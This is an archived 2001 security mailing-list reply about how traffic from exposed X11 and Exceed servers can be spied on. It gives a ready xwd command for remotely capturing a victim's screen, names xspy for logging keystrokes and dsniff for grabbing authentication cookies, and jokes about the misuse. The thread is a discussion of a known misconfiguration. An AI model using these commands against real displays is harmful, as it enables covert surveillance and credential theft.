Power Steve wrote:
>
> Anyone know if you can meaningfully sniff Exceed ( I guess it's the same as
> X) traffic? Im being a bit lame, my personal test lab is down atm, and I
> cant find anything on the net re sniffing and interpreting X traffic.
You can have quite a bit of 'fun' with X11.
i.e.
If someone running an unprotected X server - not using MIT Magic Cookies
or xhost authentication properly for example (they have issued 'xhost +'
...) - then you can easily grab a screenshot of their X display
(remotely).
Grab:
/usr/X/bin/xwd x11user.victum.com:0 -root -out /tmp/i_can_see_you.dmp
(:0 indicates the first X display - this listens on port 6000, :1 would
be port 6001 etc.)
View:
/usr/X/bin/xwud -in /tmp/i_can_see_you.dmp
Out of the box, The Exceed X11 server places no restrictions on remote
connections... :-(
xspy - http://www.acm.vt.edu/~jmaxwell/programs/xspy/xspy.html - can be
used to capture keystrokes from an X server. You don't need much of an
imagination to realize what sort of thing it can be used for :-).
Pretty much any packet sniffer can grab X11 packets. AFAIK dsniff will
sniff MIT Magic cookies.
Cheers,
Mike.
----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
Received on Aug 13 2001
Intro
